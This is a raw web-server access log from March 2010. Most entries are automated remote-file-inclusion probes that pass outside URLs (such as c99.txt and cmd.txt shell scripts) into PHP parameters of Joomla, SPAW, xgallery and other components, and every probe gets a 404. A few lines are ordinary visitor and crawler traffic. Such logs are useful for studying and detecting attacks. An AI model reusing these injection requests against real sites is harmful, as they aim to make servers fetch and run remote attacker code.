211.233.8.83 - - [19/Mar/2010:04:53:02 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.8.83 - - [19/Mar/2010:04:53:02 -0400] "GET /index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
175.144.54.69 - - [19/Mar/2010:04:53:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
175.144.54.69 - - [19/Mar/2010:04:53:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
175.144.54.69 - - [19/Mar/2010:04:53:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
175.144.54.69 - - [19/Mar/2010:04:53:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.195.114.252 - - [19/Mar/2010:04:52:43 -0400] "GET /logs/access_log.Q109083100 HTTP/1.0" 200 4870488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.144.54.69 - - [19/Mar/2010:04:53:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
175.144.54.69 - - [19/Mar/2010:04:53:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
85.119.152.183 - - [19/Mar/2010:04:53:43 -0400] "GET /logs/error_log.Q110030800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
67.199.100.219 - - [19/Mar/2010:04:53:46 -0400] "GET ///bbs//delete_all.php?board_skin_path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
202.65.196.35 - - [19/Mar/2010:04:53:57 -0400] "GET /logs/error_log.Q109082100/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
202.65.196.35 - - [19/Mar/2010:04:53:57 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:53:57 -0400] "GET /logs/error_log.Q110020600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
202.65.196.35 - - [19/Mar/2010:04:53:57 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:54:03 -0400] "GET /logs/access_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:54:05 -0400] "GET /logs/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:54:05 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:54:05 -0400] "GET /index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
208.77.223.114 - - [19/Mar/2010:04:54:06 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
208.77.223.114 - - [19/Mar/2010:04:54:07 -0400] "GET /index.php?pg=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
208.77.223.114 - - [19/Mar/2010:04:54:08 -0400] "GET /logs/index.php?pg=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.233.8.83 - - [19/Mar/2010:04:54:08 -0400] "GET /logs/error_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:54:10 -0400] "GET /logs/error_log.Q109082500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:54:16 -0400] "GET /logs/access_log.Q110020600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:54:25 -0400] "GET /logs/access_log.Q110030800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:54:32 -0400] "GET /logs/error_log.Q109111500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
202.65.196.35 - - [19/Mar/2010:04:54:41 -0400] "GET /logs/access_log.Q109122300/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
202.65.196.35 - - [19/Mar/2010:04:55:32 -0400] "GET /logs/access_log.Q109122300/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
180.68.242.166 - - [19/Mar/2010:04:55:45 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.56.65.232 - - [19/Mar/2010:04:56:00 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:04:56:01 -0400] "GET /index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:04:56:02 -0400] "GET /logs/index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
180.68.242.166 - - [19/Mar/2010:04:56:15 -0400] "GET /logs/error_log.Q109100900/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.111.95.42 - - [19/Mar/2010:04:56:28 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
193.111.95.42 - - [19/Mar/2010:04:56:28 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://bajuszbt.hu/help/ts????? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
85.119.152.183 - - [19/Mar/2010:04:56:31 -0400] "GET //bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:56:31 -0400] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:56:31 -0400] "GET /logs/access_log.Q110012500%20%20//bbs/delete_all.php?board_skin_path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.56.65.232 - - [19/Mar/2010:04:56:34 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:04:56:35 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
195.56.65.232 - - [19/Mar/2010:04:56:35 -0400] "GET /logs/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
64.237.46.229 - - [19/Mar/2010:04:56:51 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
64.237.46.229 - - [19/Mar/2010:04:56:52 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
64.237.46.229 - - [19/Mar/2010:04:56:52 -0400] "GET /logs/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
72.29.80.127 - - [19/Mar/2010:04:57:33 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
72.29.80.127 - - [19/Mar/2010:04:57:34 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
72.29.80.127 - - [19/Mar/2010:04:57:35 -0400] "GET /logs/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
65.18.200.100 - - [19/Mar/2010:04:57:40 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:57:41 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:56:12 -0400] "GET /logs/access_log.Q109073000 HTTP/1.0" 200 4555164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.179.177.167 - - [19/Mar/2010:04:57:55 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:57:55 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:57:55 -0400] "GET /logs/access_log.Q109101900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
95.110.193.89 - - [19/Mar/2010:04:58:02 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
95.110.193.89 - - [19/Mar/2010:04:58:03 -0400] "GET /index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
95.110.193.89 - - [19/Mar/2010:04:58:04 -0400] "GET /logs/index.php?pg=http://www.xn--104-ep4e210o.tw/appserv/bot1.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
210.179.177.167 - - [19/Mar/2010:04:58:06 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
78.185.77.242 - - [19/Mar/2010:04:58:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.185.77.242 - - [19/Mar/2010:04:58:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6"
164.77.228.200 - - [19/Mar/2010:04:58:23 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:58:23 -0400] "GET /logs/error_log.Q110022300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
95.110.196.60 - - [19/Mar/2010:04:58:24 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
78.185.77.242 - - [19/Mar/2010:04:58:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.185.77.242 - - [19/Mar/2010:04:58:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.110.196.60 - - [19/Mar/2010:04:58:24 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
95.110.196.60 - - [19/Mar/2010:04:58:26 -0400] "GET /logs/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
95.108.128.242 - - [19/Mar/2010:04:58:07 -0400] "GET /logs/error_log.Q109062200 HTTP/1.1" 200 2378634 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.247.160.130 - - [19/Mar/2010:04:59:54 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:59:54 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:04:59:54 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
95.131.65.51 - - [19/Mar/2010:05:00:10 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wooljip.com/bbs/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.834"
82.76.12.197 - - [19/Mar/2010:05:00:13 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
82.76.12.197 - - [19/Mar/2010:05:00:14 -0400] "GET /index.php?pg=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
210.179.177.167 - - [19/Mar/2010:05:00:15 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:05:00:15 -0400] "GET /logs/access_log.Q109101900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:05:00:15 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.76.12.197 - - [19/Mar/2010:05:00:15 -0400] "GET /logs/index.php?pg=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
125.251.189.4 - - [19/Mar/2010:05:00:16 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:17 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:17 -0400] "GET /logs/access_log.Q110031100//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:05:00:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.179.177.167 - - [19/Mar/2010:05:00:22 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:22 -0400] "GET /logs/error_log.Q109112900%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:28 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:28 -0400] "GET /logs/access_log.Q110031100//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:28 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:30 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:30 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:30 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:32 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:32 -0400] "GET /logs/access_log.Q110031100//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:32 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:35 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:37 -0400] "GET /logs/access_log.Q110031100//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:00:37 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:45 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:45 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:00:45 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.7.205.103 - - [19/Mar/2010:05:01:04 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.833"
66.7.205.103 - - [19/Mar/2010:05:01:04 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.833"
66.7.205.103 - - [19/Mar/2010:05:01:04 -0400] "GET /logs/access_log.Q109072700/bemarket/postscript/postscript.php?p_mode=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.833"
125.251.189.4 - - [19/Mar/2010:05:01:06 -0400] "GET /logs/access_log.Q110031100//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:01:06 -0400] "GET //netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:01:06 -0400] "GET /logs//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:01:10 -0400] "GET /logs/error_log.Q109112900%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.7.205.103 - - [19/Mar/2010:05:01:11 -0400] "GET /logs/error_log.Q109112800/bemarket/postscript/postscript.php?p_mode=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.833"
164.77.228.200 - - [19/Mar/2010:05:01:12 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:05:01:12 -0400] "GET /logs/error_log.Q109051100//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:01:16 -0400] "GET /logs/error_log.Q109112900%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:01:23 -0400] "GET /index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:01:23 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:01:23 -0400] "GET /logs/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:01:45 -0400] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:01:45 -0400] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:01:45 -0400] "GET /logs/access_log.Q109060600%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.98.34.37 - - [19/Mar/2010:05:01:53 -0400] "GET /logs/access_log.Q109100900/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:05:01:53 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
70.98.34.37 - - [19/Mar/2010:05:01:53 -0400] "GET /logs/index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
125.247.160.130 - - [19/Mar/2010:05:02:06 -0400] "GET /logs/access_log.Q109060600%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:02:06 -0400] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:02:06 -0400] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:05:02:07 -0400] "GET /logs/access_log.Q110031100%20%20//netcat_files/?INCLUDE_FOLDER=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:02:12 -0400] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:05:02:12 -0400] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
